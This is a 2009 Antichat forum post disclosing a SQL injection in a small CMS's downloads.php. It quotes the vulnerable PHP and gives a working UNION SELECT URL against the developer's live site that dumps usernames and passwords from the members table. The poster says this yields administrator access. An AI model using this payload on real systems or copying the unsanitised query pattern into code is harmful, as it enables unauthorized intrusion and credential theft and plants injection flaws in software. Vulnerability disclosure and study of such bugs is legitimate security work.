ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 24.12.2009, 14:57
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Update: #244
Версия ядра обновилась.Целевая версия - 1.1.Как водиться,с обновлением, разработчики только прибавили дырок.

SQL-inj


File: downloads.php
PHP код:
if(isset($_GET['cat'])){
$result mysql_query("SELECT * FROM xcms_downloads WHERE category=".$_GET['cat']." ORDER By id DESC") or die(mysql_error());  
    
$content .=" <div class='post' id='post-8'> ";
    
            while(
$downloads mysql_fetch_array$result )) {
                
$content .="
                    <table width='100%' cellpadding='0' cellspacing='1' class='tbl-border'> 
                    <tr> 
                    <td colspan='3' class='tbl2'><strong><a href='"
.DOWNLOADS.$downloads['file']."'>".$downloads['name']."</a></strong>
                    </td> 
                    <tr> 
                    <td colspan='3' class='tbl1'>"
.$downloads['description']."</td> 
                    </tr> 
                    <tr> 
                    <td width='30%' class='tbl2'><strong>Added:</strong> "
.$downloads['uploaded']."</td> 
                    <td width='30%' class='tbl1'><strong>Uploaded by:</strong><b><a href='"
.BASEDIR."profile.php?view=".$downloads['uploader']."'> ".$downloads['uploader']."</b></a></td> 
                    <td width='40%' class='tbl2'><b><a href='"
.$_SERVER['PHP_SELF']."?download=".$downloads['id']."'>Download (".$downloads['downloaded'].")</a></b></td> 
                    </tr> 
                    </table><br>
                "
;
            } 
Target: Сайт разработчика:
http://sphere.xlentprojects.se/downloads.php?cat=1+union+select+1,id,3,4,username ,password,7,8,9+from+xcms_members+--+
Логинимся - мы администраторы.Не будем ничеготрогать,мы же не хокеры

Пропустим мимо глаз то,что уязвимы 70% всех файлов.В 1 вывод лучше всего,на нем и остановимся.

не надо логин-пароль писать

Последний раз редактировалось HAXTA4OK; 24.12.2009 в 15:11..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ